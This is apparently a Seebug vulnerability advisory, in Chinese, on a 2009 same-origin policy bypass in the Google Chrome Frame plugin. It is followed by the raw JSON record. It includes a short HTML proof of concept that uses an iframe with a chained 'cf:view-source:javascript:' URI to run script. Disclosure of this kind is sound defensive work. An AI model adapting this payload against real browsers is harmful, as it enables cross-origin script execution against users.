Search...

Google Chrome帧同源策略绕过漏洞

2009-11-20T00:00:00

ID SSV:12669
Type seebug
Reporter Root
Modified 2009-11-20T00:00:00

Description

Bugraq ID: 37067

Google Chrome Frame是一款浏览器插件，可使用户的浏览器外观依然是IE的菜单和界面，但实际是Google Chrome浏览器内核浏览网页。 Google Chrome Frame存在安全漏洞允许攻击者绕过同源策略并执行特权操作。

Google Chrome Frame 4.0.223.9 Google Chrome Frame 4.0.245.1 (Official Build 31970)已经修复此漏洞，建议用户下载使用： http://www.google.com/chromeframe

                                        
                                            
                                                建立如下HTML文档并进行测试：
&lt;iframe src=&quot;javascript:alert(1)&gt;&lt;/iframe&gt;
=&gt; 打开iframe并执行警告
(这是正确的)
&lt;iframe src=&quot;cf:javascript:alert(1)&gt;&lt;/iframe&gt; 
上面不能成功执行, 不能限制警告(正确)
但如下情况存在一个缺陷=&gt;
&lt;iframe src=&quot;cf:view-source:javascript:alert(1)&gt;&lt;/iframe&gt;
如上代码可在本地或远程安全上下文或通过地址栏执行，成功绕过跨域保护。

JSON Vulners Source

Initial Source

{"id": "SSV:12669", "type": "seebug", "bulletinFamily": "exploit", "title": "Google Chrome\u5e27\u540c\u6e90\u7b56\u7565\u7ed5\u8fc7\u6f0f\u6d1e", "description": "Bugraq ID: 37067\r\n\r\nGoogle Chrome Frame\u662f\u4e00\u6b3e\u6d4f\u89c8\u5668\u63d2\u4ef6\uff0c\u53ef\u4f7f\u7528\u6237\u7684\u6d4f\u89c8\u5668\u5916\u89c2\u4f9d\u7136\u662fIE\u7684\u83dc\u5355\u548c\u754c\u9762\uff0c\u4f46\u5b9e\u9645\u662fGoogle Chrome\u6d4f\u89c8\u5668\u5185\u6838\u6d4f\u89c8\u7f51\u9875\u3002\r\nGoogle Chrome Frame\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u5141\u8bb8\u653b\u51fb\u8005\u7ed5\u8fc7\u540c\u6e90\u7b56\u7565\u5e76\u6267\u884c\u7279\u6743\u64cd\u4f5c\u3002\n\nGoogle Chrome Frame 4.0.223.9\nGoogle Chrome Frame 4.0.245.1 (Official Build 31970)\u5df2\u7ecf\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.google.com/chromeframe", "published": "2009-11-20T00:00:00", "modified": "2009-11-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.seebug.org/vuldb/ssvid-12669", "reporter": "Root", "references": [], "cvelist": [], "lastseen": "2017-11-19T18:31:00", "history": [], "viewCount": 0, "enchantments": {"vulnersScore": 2.8}, "enchantments_done": [], "objectVersion": "1.4", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12669", "sourceData": "\n \u5efa\u7acb\u5982\u4e0bHTML\u6587\u6863\u5e76\u8fdb\u884c\u6d4b\u8bd5\uff1a\r\n<iframe src="javascript:alert(1)></iframe>\r\n=> \u6253\u5f00iframe\u5e76\u6267\u884c\u8b66\u544a\r\n(\u8fd9\u662f\u6b63\u786e\u7684)\r\n<iframe src="cf:javascript:alert(1)></iframe> \r\n\u4e0a\u9762\u4e0d\u80fd\u6210\u529f\u6267\u884c, \u4e0d\u80fd\u9650\u5236\u8b66\u544a(\u6b63\u786e)\r\n\u4f46\u5982\u4e0b\u60c5\u51b5\u5b58\u5728\u4e00\u4e2a\u7f3a\u9677=>\r\n<iframe src="cf:view-source:javascript:alert(1)></iframe>\r\n\u5982\u4e0a\u4ee3\u7801\u53ef\u5728\u672c\u5730\u6216\u8fdc\u7a0b\u5b89\u5168\u4e0a\u4e0b\u6587\u6216\u901a\u8fc7\u5730\u5740\u680f\u6267\u884c\uff0c\u6210\u529f\u7ed5\u8fc7\u8de8\u57df\u4fdd\u62a4\u3002\r\n\n ", "status": "poc,details", "_object_type": "robots.models.seebug.SeebugBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"]}